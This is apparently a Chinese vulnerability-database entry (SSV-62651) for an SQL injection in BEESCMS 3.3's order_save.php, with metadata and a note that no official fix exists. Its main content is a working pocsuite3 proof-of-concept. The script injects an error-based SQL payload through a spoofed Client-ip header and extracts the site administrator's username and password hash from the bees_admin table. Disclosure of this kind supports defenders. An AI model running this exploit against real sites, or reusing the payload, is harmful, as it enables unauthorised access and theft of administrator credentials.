beescms 3.3 /mx_form/order_save.php SQL注入漏洞

基本字段

漏洞编号：: SSV-62651

披露/发现时间：: 2014-04-18

提交时间：: 2014-05-12

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: BEESCMS
(漏洞影响:,BEESCMS 3.3)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (pocsuite 插件) (pocsuite3 插件)

贡献者 Knownsec 共获得 0KB

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout import re class DemoPOC(POCBase): vulID = '1249' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-04-12' createDate = '2014-04-18' updateDate = '2014-04-18' references = ['http://www.wooyun.org/bugs/wooyun-2010-055608'] name = 'beescms 3.3 /mx_form/order_save.php SQL注入漏洞 POC' appPowerLink = 'http://www.beescms.com/' appName = 'BEESCMS' appVersion = '3.3#' vulType = 'SQL Injection' desc = ''' BEESCMS 3.3 /mx_form/order_save.php文件中 line 59对$ip的检查可以使用大小写绕过，然后在line 63将$ip拼接在SQL语句中形成SQL注入漏洞 ''' samples = [] install_requires = [''] def _verify(self): result = {} url = self.url + '/mx_form/order_save.php' headers_fake = {} headers_fake['Client-ip'] = '127.0.0.1\',(SELECT 1 FROM (SELECT count(1),' \ 'concat(round(rand(0)),(SELECT concat(0x71677' \ '66571,0x7c,admin_name,0x3a73706c69743a,admin' \ '_password,0x7c,0x716b616771) FROM bees_admin' \ ' LIMIT 0,1))a FROM information_schema.tables' \ ' GROUP by a)b))#' data = 'form_id=5&fields%5Bmail%5D=1&fields%5Busername%5D=1&fields%5Btel%' \ '5D=1&fields%5Bweb_contact%5D=1&fields%5Baddress%5D=1&fields%5Bcon' \ 'tent%5D=1&lang=cn&f_id=23&submit=%E6%8F%90%E4%BA%A4' r = requests.post(url, data=data, headers=headers_fake) content = r.text results = re.findall('qgveq\|(.+):split:([a-fA-F0-9]{32})\|qkagq', content) if results: result['Database'] = {} result['Database']['Username'] = results[0][0] result['Database']['Password'] = results[0][1] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)

共 0 兑换

参考链接

http://www.wooyun.org/bugs/wooyun-2010-055608

解决方案

临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite3 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

beescms 3.3 /mx_form/order_save.php SQL注入漏洞

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite3 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定